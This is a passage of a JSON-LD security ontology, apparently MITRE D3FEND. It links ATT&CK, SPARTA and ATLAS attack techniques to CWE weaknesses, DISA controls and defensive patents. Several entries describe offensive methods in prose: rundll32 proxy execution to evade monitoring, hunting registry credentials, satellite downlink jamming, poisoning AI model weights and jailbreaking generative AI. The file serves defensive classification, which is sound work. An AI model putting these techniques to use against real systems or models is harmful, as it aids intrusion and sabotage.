      "@type": "owl:Class",
      "d3f:attack-id": "T1085",
      "d3f:definition": "The rundll32.exe program can be called to execute an arbitrary binary. Adversaries may take advantage of this functionality to proxy execution of code to avoid triggering security tools that may not monitor execution of the rundll32.exe process because of whitelists or false positives from Windows using rundll32.exe for normal operations.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1218.011",
      "rdfs:label": "Rundll32",
      "rdfs:seeAlso": {
        "@id": "d3f:T1218.011"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "d3f:ExecutionTechnique"
        }
      ]
    },
    {
      "@id": "d3f:IMP-0005",
      "@type": "owl:Class",
      "d3f:attack-id": "IMP-0005",
      "d3f:definition": "Measures designed to permanently eliminate the use of a system, potentially through some physical damage to the system. Threat actors may destroy data, commands, subsystems, or attempt to destroy the victim spacecraft itself. This behavior is different from Degradation, as the individual parts are destroyed rather than put in a position in which they would slowly degrade over time.",
      "rdfs:label": "Destruction - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/IMP-0005/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAImpactTechnique"
      },
      "skos:prefLabel": "Destruction"
    },
    {
      "@id": "d3f:RD-0001.02",
      "@type": "owl:Class",
      "d3f:attack-id": "RD-0001.02",
      "d3f:definition": "Instead of building dishes, adversaries may rent time on commercial ground networks or cloud-integrated “ground-station-as-a-service.” Access can be obtained legitimately (front companies, weak vetting) or via compromised customer accounts, allowing schedule requests, RF front-end configuration, and data egress through reputable providers. The appeal is speed, global reach, and plausible deniability; the risk to defenders is that traffic originates from expected stations and IP ranges. Misuse may include reconnaissance (passive capture), selective denial (misconfiguration or saturation attempts), or, where authentication is weak, unauthorized commanding.",
      "rdfs:label": "Commercial Ground Station Services - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/RD-0001/02/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:RD-0001"
      },
      "skos:prefLabel": "Commercial Ground Station Services"
    },
    {
      "@id": "d3f:Reference-CAR-2020-09-004%3ACredentialsInFiles%26Registry_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2020-09-004/"
      },
      "d3f:kb-abstract": "Adversaries may search the Windows Registry on compromised systems for insecurely stored credentials for credential access. This can be accomplished using the query functionality of the reg.exe system utility, by looking for keys and values that contain strings such as “password”. In addition, adversaries may use toolkits such as PowerSploit in order to dump credentials from various applications such as IIS.Accordingly, this analytic looks for invocations of reg.exe in this capacity as well as that of several powersploit modules with similar functionality.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessSpawnAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2020-09-004: Credentials in Files & Registry",
      "rdfs:label": "Reference - CAR-2020-09-004: Credentials in Files & Registry - MITRE"
    },
    {
      "@id": "d3f:PhysicalArtifact",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "rdfs:label": "Physical Artifact",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Artifact"
        },
        {
          "@id": "_:N7f95fb328a5347d0a9b397c9237044b7"
        }
      ],
      "skos:altLabel": "Physical Object"
    },
    {
      "@id": "_:N7f95fb328a5347d0a9b397c9237044b7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-location"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PhysicalLocation"
      }
    },
    {
      "@id": "d3f:CCI-001428_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:UserAccountPermissions"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system displays security attributes in human-readable form on each object that the system transmits to output devices to identify organization-identified special dissemination, handling, or distribution instructions using organization-identified human-readable, standard naming conventions.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-25T00:00:00"
      },
      "rdfs:label": "CCI-001428"
    },
    {
      "@id": "d3f:Reference-ArchitectureOfTransparentNetworkSecurityForApplicationContainers_NeuvectorInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20170093922A1"
      },
      "d3f:kb-abstract": "A system comprises one or more application containers, each application container including computer-readable instructions and initiated via a container service and isolated using operating system-level virtualization. The system also comprises one or more virtual switches configured to route traffic from the application containers. The system further comprises one or more security containers, each security container configured to transparently intercept traffic from the one or more application containers for analysis of network security. The system further comprises a user interface (UI) container configured to receive configuration settings from a user. The system also comprises an analytics container configured to perform analysis on data received from the one or more security containers. The system also comprises a management container configured to configure settings for the one or more security containers and the analytics container.",
      "d3f:kb-author": "Gang Duan",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Neuvector Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:SystemCallFiltering"
      },
      "d3f:kb-reference-title": "Architecture of transparent network security for application containers",
      "rdfs:label": "Reference - Architecture of transparent network security for application containers - Neuvector Inc"
    },
    {
      "@id": "d3f:Condition",
      "@type": "owl:Class",
      "d3f:definition": "An assumption on which rests the validity or effect of something else.",
      "rdfs:comment": "Less common usage versus state, meant to superclass precondition, postcondition, and effect.",
      "rdfs:isDefinedBy": "n-06768279",
      "rdfs:label": "Condition",
      "rdfs:subClassOf": {
        "@id": "d3f:D3FENDCore"
      }
    },
    {
      "@id": "d3f:CWE-486",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-486",
      "d3f:definition": "The product compares classes by name, which can cause it to use the wrong class when multiple classes can have the same name.",
      "rdfs:label": "Comparison of Classes by Name",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1025"
      }
    },
    {
      "@id": "d3f:AccessMediator",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An Access Mediator enforces access control policies to regulate interactions with a resource.",
      "d3f:implements": {
        "@id": "d3f:AccessControlConfiguration"
      },
      "d3f:mediates-access-to": {
        "@id": "d3f:Resource"
      },
      "d3f:used-by": {
        "@id": "d3f:Agent"
      },
      "rdfs:label": "Access Mediator",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalInformationBearer"
        },
        {
          "@id": "_:N43c216ffe3be45a6b625e799978ecdcd"
        },
        {
          "@id": "_:N41564901dd804f4f9552fad558813720"
        },
        {
          "@id": "_:N1ead1a49ab0848e291a56446695bb0cf"
        }
      ]
    },
    {
      "@id": "_:N43c216ffe3be45a6b625e799978ecdcd",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:implements"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AccessControlConfiguration"
      }
    },
    {
      "@id": "_:N41564901dd804f4f9552fad558813720",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:mediates-access-to"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Resource"
      }
    },
    {
      "@id": "_:N1ead1a49ab0848e291a56446695bb0cf",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:used-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Agent"
      }
    },
    {
      "@id": "d3f:ContentFiltering",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ContentFiltering"
      ],
      "d3f:d3fend-id": "D3-CF",
      "d3f:definition": "Content Filtering techniques aid in the process of analyzing an input file for malicious or erroneous content and outputing a sanitized version.",
      "d3f:enables": {
        "@id": "d3f:Isolate"
      },
      "d3f:enforces": {
        "@id": "d3f:ContentPolicy"
      },
      "d3f:filters": {
        "@id": "d3f:File"
      },
      "d3f:kb-reference": {
        "@id": "d3f:Reference-MethodForContentDisarmandReconstruction_OPSWATInc"
      },
      "rdfs:label": "Content Filtering",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefensiveTechnique"
        },
        {
          "@id": "_:N55f7b613ccae45ffb38b94a75341d46b"
        },
        {
          "@id": "_:Ne123ae17a9034e279e3a3294d0d97640"
        },
        {
          "@id": "_:N290b1bff893545619fae55647e2711f1"
        }
      ]
    },
    {
      "@id": "_:N55f7b613ccae45ffb38b94a75341d46b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Isolate"
      }
    },
    {
      "@id": "_:Ne123ae17a9034e279e3a3294d0d97640",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enforces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ContentPolicy"
      }
    },
    {
      "@id": "_:N290b1bff893545619fae55647e2711f1",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:filters"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "d3f:T1599.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1599.001",
      "d3f:definition": "Adversaries may bridge network boundaries by modifying a network device’s Network Address Translation (NAT) configuration. Malicious modifications to NAT may enable an adversary to bypass restrictions on traffic routing that otherwise separate trusted and untrusted networks.",
      "rdfs:label": "Network Address Translation Traversal",
      "rdfs:subClassOf": {
        "@id": "d3f:T1599"
      }
    },
    {
      "@id": "d3f:AML.T0018.000",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0018.000",
      "d3f:definition": "Adversaries may manipulate an AI model's weights to change it's behavior or performance, resulting in a poisoned model.\nAdversaries may poison a model by by directly manipulating its weights, training the model on poisoned data, further fine-tuning the model, or otherwise interfering with its training process.\n\nThe change in behavior of poisoned models may be limited to targeted categories in predictive AI models, or targeted topics, concepts, or facts in generative AI models, or aim for a general performance degradation.",
      "rdfs:label": "Poison AI Model - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0018.000"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0018"
      },
      "skos:prefLabel": "Poison AI Model"
    },
    {
      "@id": "d3f:CWE-1117",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1117",
      "d3f:definition": "The code contains a function or method whose signature and/or associated inline documentation does not sufficiently describe the callable's inputs, outputs, side effects, assumptions, or return codes.",
      "rdfs:label": "Callable with Insufficient Behavioral Summary",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1078"
      }
    },
    {
      "@id": "d3f:T1145",
      "@type": "owl:Class",
      "d3f:attack-id": "T1145",
      "d3f:definition": "Private cryptographic keys and certificates are used for authentication, encryption/decryption, and digital signatures. (Citation: Wikipedia Public Key Crypto)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1552.004",
      "rdfs:label": "Private Keys",
      "rdfs:seeAlso": {
        "@id": "d3f:T1552.004"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:CredentialAccessTechnique"
      }
    },
    {
      "@id": "d3f:T1105",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1105",
      "d3f:definition": "Session is initiated by the client, and may be a custom protocol which is why it is related to generic network traffic instead of file transfer network traffic.",
      "d3f:produces": {
        "@id": "d3f:OutboundInternetNetworkTraffic"
      },
      "rdfs:label": "Ingress Tool Transfer",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CommandAndControlTechnique"
        },
        {
          "@id": "_:Nc3beb1e1821844a8a6c201f5ed087bfa"
        }
      ]
    },
    {
      "@id": "_:Nc3beb1e1821844a8a6c201f5ed087bfa",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OutboundInternetNetworkTraffic"
      }
    },
    {
      "@id": "d3f:ExternalThing",
      "@type": "owl:Class",
      "rdfs:label": "External Thing"
    },
    {
      "@id": "d3f:ActivityDependency",
      "@type": "owl:Class",
      "d3f:definition": "An activity dependency is a dependency that indicates an activity has an activity or agent which relies on it in order to be functional.",
      "rdfs:label": "Activity Dependency",
      "rdfs:subClassOf": {
        "@id": "d3f:Dependency"
      }
    },
    {
      "@id": "d3f:Capability",
      "@type": "owl:Class",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Capability_(systems_engineering)"
      },
      "rdfs:label": "Capability",
      "rdfs:seeAlso": {
        "@id": "https://web.archive.org/web/20081123014953/http://www.dtic.mil/doctrine/jel/new_pubs/jp1_02.pdf"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ExternalThing"
      }
    },
    {
      "@id": "d3f:Reference-RegistryKeySecurityAndAccessRights",
      "@type": [
        "owl:NamedIndividual",
        "d3f:UserManualReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry-key-security-and-access-rights"
      },
      "d3f:kb-abstract": "The Windows security model enables you to control access to registry keys. For more information about security, see Access-Control Model.",
      "d3f:kb-organization": "Microsoft",
      "d3f:kb-reference-of": {
        "@id": "d3f:UserSessionInitConfigAnalysis"
      },
      "d3f:kb-reference-title": "Registry Key Security and Access Rights",
      "rdfs:label": "Reference - Registry Key Security and Access Rights"
    },
    {
      "@id": "d3f:SystemConfigSystemCall",
      "@type": "owl:Class",
      "rdfs:label": "System Config System Call",
      "rdfs:subClassOf": {
        "@id": "d3f:SystemCall"
      }
    },
    {
      "@id": "d3f:CWE-789",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-789",
      "d3f:definition": "The product allocates memory based on an untrusted, large size value, but it does not ensure that the size is within expected limits, allowing arbitrary amounts of memory to be allocated.",
      "d3f:synonym": "Stack Exhaustion",
      "rdfs:label": "Memory Allocation with Excessive Size Value",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-1284"
        },
        {
          "@id": "d3f:CWE-770"
        }
      ]
    },
    {
      "@id": "d3f:CCI-001811_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system alerts organization-defined personnel or roles when the unauthorized installation of software is detected.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:FileAnalysis"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-03-01T00:00:00"
      },
      "rdfs:label": "CCI-001811"
    },
    {
      "@id": "d3f:Reference-MalwareAnalysisSystem_PaloAltoNetworksInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20150319136A1"
      },
      "d3f:kb-abstract": "In some embodiments, a malware analysis system includes receiving a potential malware sample from a firewall; analyzing the potential malware sample using a virtual machine to determine if the potential malware sample is malware; and automatically generating a signature if the potential malware sample is determined to be malware. In some embodiments, the potential malware sample does not match a preexisting signature, and the malware is a zero-day attack.",
      "d3f:kb-author": "Huagang Xie; Xinran Wang; Jiangxia Liu",
      "d3f:kb-mitre-analysis": "This patent describes a VM sandbox environment that uses heuristic based analysis techniques performed in real-time during a file transfer to determine if the file is malicious. A new signature can then be generated and distributed to automatically block future file transfer requests to download the malicious file.",
      "d3f:kb-organization": "Palo Alto Networks Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:DynamicAnalysis"
      },
      "d3f:kb-reference-title": "Malware analysis system",
      "rdfs:label": "Reference - Malware analysis system - Palo Alto Networks Inc"
    },
    {
      "@id": "d3f:EX-0016.02",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "EX-0016.02",
      "d3f:definition": "Downlink jammers target the users of a satellite by creating noise in the same frequency as the downlink signal from the satellite. A downlink jammer only needs to be as powerful as the signal being received on the ground and must be within the field of view of the receiving terminal’s antenna. This limits the number of users that can be affected by a single jammer. Since many ground terminals use directional antennas pointed at the sky, a downlink jammer typically needs to be located above the terminal it is attempting to jam. This limitation can be overcome by employing a downlink jammer on an air or space-based platform, which positions the jammer between the terminal and the satellite. This also allows the jammer to cover a wider area and potentially affect more users. Ground terminals with omnidirectional antennas, such as many GPS receivers, have a wider field of view and thus are more susceptible to downlink jamming from different angles on the ground.*\n\n*https://aerospace.csis.org/aerospace101/counterspace-weapons-101",
      "d3f:impairs": {
        "@id": "d3f:Receiver"
      },
      "d3f:jams": {
        "@id": "d3f:WirelessLink"
      },
      "rdfs:label": "Downlink Jamming - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0016/02/"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:EX-0016"
        },
        {
          "@id": "_:N2949ce5a20654754bd154e98fce6e5cb"
        },
        {
          "@id": "_:Ncb277b147ab848e983e2454d5e08ce73"
        }
      ],
      "skos:prefLabel": "Downlink Jamming"
    },
    {
      "@id": "_:N2949ce5a20654754bd154e98fce6e5cb",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:impairs"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Receiver"
      }
    },
    {
      "@id": "_:Ncb277b147ab848e983e2454d5e08ce73",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:jams"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WirelessLink"
      }
    },
    {
      "@id": "d3f:CWE-1127",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1127",
      "d3f:definition": "The code is compiled without sufficient warnings enabled, which may prevent the detection of subtle bugs or quality issues.",
      "rdfs:label": "Compilation with Insufficient Warnings or Errors",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-710"
      }
    },
    {
      "@id": "d3f:CWE-363",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-363",
      "d3f:definition": "The product checks the status of a file or directory before accessing it, which produces a race condition in which the file can be replaced with a link before the access is performed, causing the product to access the wrong file.",
      "rdfs:label": "Race Condition Enabling Link Following",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-367"
      }
    },
    {
      "@id": "d3f:CWE-324",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-324",
      "d3f:definition": "The product uses a cryptographic key or password past its expiration date, which diminishes its safety significantly by increasing the timing window for cracking attacks against that key.",
      "rdfs:label": "Use of a Key Past its Expiration Date",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-672"
      }
    },
    {
      "@id": "d3f:CCI-001426_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:UserAccountPermissions"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system maintains the binding of security attributes to information with sufficient assurance that the information--attribute association can be used as the basis for automated policy actions.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-25T00:00:00"
      },
      "rdfs:label": "CCI-001426"
    },
    {
      "@id": "d3f:CCI-001685_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system notifies organization-defined personnel or roles for account disabling actions.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:DomainAccountMonitoring"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2011-05-03T00:00:00"
      },
      "rdfs:label": "CCI-001685"
    },
    {
      "@id": "d3f:Reference-MethodAndSystemForUDPFloodAttackDetection-RioreyLLC",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US8307430B1"
      },
      "d3f:kb-abstract": "A system and method is provided to identify UDP attacks. A processor determines a spectral density of packet timing intervals, a natural distance between the spectral density and a uniform distribution, and a non-linear amplifier applying a non-linear amplification to the natural distance to detect a denial-of-service attack. It uses the concept of traffic statistics analysis, i.e., spectral densities of arrived-packet timing intervals, calculates the KL-distance measurement and makes decision based on the output of a non-linear Gaussian amplifier, with which one can easily adjust the amplifier via selecting different parameters of mean and variance to satisfy system requirements of false-positive and false-negative UDP attack detections.",
      "d3f:kb-author": "Hongda Chen, Lijin Lu",
      "d3f:kb-reference-of": {
        "@id": "d3f:InboundSessionVolumeAnalysis"
      },
      "d3f:kb-reference-title": "Method and system for UDP flood attack detection",
      "rdfs:label": "Reference - Method and system for UDP flood attack detection - Riorey LLC"
    },
    {
      "@id": "d3f:may-evaluate",
      "@type": "owl:ObjectProperty",
      "rdfs:label": "may-evaluate",
      "rdfs:subPropertyOf": {
        "@id": "d3f:may-be-associated-with"
      }
    },
    {
      "@id": "d3f:T1406.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1406.002",
      "d3f:definition": "Adversaries may perform software packing to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory.",
      "rdfs:label": "Software Packing - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:T1406"
      },
      "skos:prefLabel": "Software Packing"
    },
    {
      "@id": "d3f:CCI-002309_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:SystemConfigurationPermissions"
        },
        {
          "@id": "d3f:UserAccountPermissions"
        }
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system provides authorized individuals the capability to define or change the value of security attributes available for association with objects.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-06-24T00:00:00"
      },
      "rdfs:label": "CCI-002309"
    },
    {
      "@id": "d3f:WindowsNtWriteFileGather",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Writes specified block of file with data from memory pages.",
      "rdfs:label": "Windows NtWriteFileGather",
      "rdfs:seeAlso": {
        "@id": "https://j00ru.vexillium.org/syscalls/nt/64/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPIWriteFile"
      }
    },
    {
      "@id": "d3f:OpenFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:File"
      },
      "d3f:definition": "For most file systems, a program initializes access to a file in a file system using the open system call. This allocates resources associated to the file (the file descriptor), and returns a handle that the process will use to refer to that file. In some cases the open is performed by the first access. During the open, the filesystem may allocate memory for buffers, or it may wait until the first operation. Various other errors which may occur during the open include directory update failures, un-permitted multiple connections, media failures, communication link failures and device failures.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Open_(system_call)"
      },
      "rdfs:label": "Open File",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemCall"
        },
        {
          "@id": "_:Ne1472a48dab04b62bf5cca95b3c64eb9"
        }
      ]
    },
    {
      "@id": "_:Ne1472a48dab04b62bf5cca95b3c64eb9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "d3f:Reference-MethodAndApparatusForDetectingAnomaliesOfAnInfrastructureInANetwork",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/AU2023200991A1/"
      },
      "d3f:kb-abstract": "The present invention relates to a method and to an apparatus for detecting anomalies of an infrastructure in a network comprising analysing a data packet (PD) exchanged in a network and identifying the network protocol and all the fields, through a network analyser (101), defining an identified protocol and identified fields of said data packet (PD), and, by means of computerized data processing means (102), extracting identification fields, to identify a device of the infrastructure in the network, matching the identified device with a plurality of predefined standard devices in a predefined devices knowledge database, to recognise a matching device, retrieving one or more allowed fields and one or more allowed protocols of the matching device from the predefined devices knowledge database, comparing the allowed fields and the allowed protocols respectively with the identified fields and the identified protocol, defining at least one critical state of the infrastructure when the identified fields differ from the allowed fields or when the identified protocol differ from the allowed protocols and signalling an anomaly of the infrastructure when at least one of the critical states is identified.",
      "d3f:kb-organization": "Nozomi Networks",
      "d3f:kb-reference-of": {
        "@id": "d3f:ApplicationProtocolCommandAnalysis"
      },
      "d3f:kb-reference-title": "Method and apparatus for detecting anomalies of an infrastructure in a network",
      "rdfs:label": "Reference - Method and apparatus for detecting anomalies of an infrastructure in a network"
    },
    {
      "@id": "d3f:CWE-1173",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1173",
      "d3f:definition": "The product does not use, or incorrectly uses, an input validation framework that is provided by the source language or an independent library.",
      "rdfs:label": "Improper Use of Validation Framework",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-20"
      }
    },
    {
      "@id": "d3f:AML.T0016.002",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0016.002",
      "d3f:definition": "Adversaries may search for and obtain generative AI models or tools, such as large language models (LLMs), to assist them in various steps of their operation. Generative AI can be used in a variety of malicious ways, including generating malware or offensive cyber scripts, [Retrieval Content Crafting](/techniques/AML.T0066), or generating [Phishing](/techniques/AML.T0052) content.\n\nAdversaries may obtain an open source model or they may leverage a generative AI service. They may need to jailbreak the generative AI model to bypass any restrictions put in place to limit the types of responses it can generate. They may also need to break the terms of service of the generative AI.",
      "rdfs:label": "Generative AI - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0016.002"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0016"
      },
      "skos:prefLabel": "Generative AI"
    },
    {
      "@id": "d3f:T1098.006",
      "@type": "owl:Class",
      "d3f:attack-id": "T1098.006",
      "d3f:definition": "An adversary may add additional roles or permissions to an adversary-controlled user or service account to maintain persistent access to a container orchestration system. For example, an adversary with sufficient permissions may create a RoleBinding or a ClusterRoleBinding to bind a Role or ClusterRole to a Kubernetes account.(Citation: Kubernetes RBAC)(Citation: Aquasec Kubernetes Attack 2023) Where attribute-based access control (ABAC) is in use, an adversary with sufficient permissions may modify a Kubernetes ABAC policy to give the target account additional permissions.(Citation: Kuberentes ABAC)",
      "rdfs:label": "Additional Container Cluster Roles",
      "rdfs:subClassOf": {
        "@id": "d3f:T1098"
      }
    },
    {
      "@id": "d3f:SetRegisters",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:modifies": {
        "@id": "d3f:ProcessorRegister"
      },
      "rdfs:label": "Set Registers",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemCall"
        },
        {
          "@id": "_:N2f818563bf524e4ba70c00b4954be3fe"
        }
      ]
    },
    {
      "@id": "_:N2f818563bf524e4ba70c00b4954be3fe",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ProcessorRegister"
      }
    },
    {
      "@id": "d3f:RoutingAccessMediation",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:RoutingAccessMediation"
      ],
      "d3f:d3fend-id": "D3-RAM",
      "d3f:definition": "Routing access mediation is a network security approach that manages and controls access at the network layer using VPNs, tunneling protocols, firewall rules, and traffic inspection to ensure secure and efficient data routing.",
      "d3f:isolates": {
        "@id": "d3f:Network"
      },
      "d3f:kb-article": "## How it works\n\nRouting Access Mediation is a network security strategy focused on managing and controlling access at the network layer. It includes the use of VPNs for secure remote access, tunneling protocols for encapsulating data, firewall rules for filtering traffic, and advanced inspection techniques like Cisco's Context-Based Access Control (CBAC) to monitor and regulate data flow. This approach ensures secure and efficient routing of data across networks, protecting against unauthorized access and enhancing overall network security.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-WhatIsNetworkAccessControl"
      },
      "rdfs:label": "Routing Access Mediation",
      "rdfs:seeAlso": {
        "@id": "https://www.geeksforgeeks.org/context-based-access-control-cbac/"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkAccessMediation"
        },
        {
          "@id": "_:Nb8b6926d4a8341ca8052ed7e6c7b411a"
        }
      ]
    },
    {
      "@id": "_:Nb8b6926d4a8341ca8052ed7e6c7b411a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:isolates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Network"
      }
    },
    {
      "@id": "d3f:PatentReference",
      "@type": "owl:Class",
      "d3f:pref-label": "Patent",
      "rdfs:label": "Patent Reference",
      "rdfs:subClassOf": {
        "@id": "d3f:TechniqueReference"
      }
    },
    {
      "@id": "d3f:CWE-1315",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1315",
      "d3f:definition": "The bus controller enables bits in the fabric end-point to allow responder devices to control transactions on the fabric.",
      "rdfs:label": "Improper Setting of Bus Controlling Capability in Fabric End-point",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-284"
      }
    },
    {
      "@id": "d3f:CCI-003014_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system enforces organization-defined mandatory access control policies over all subjects and objects.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
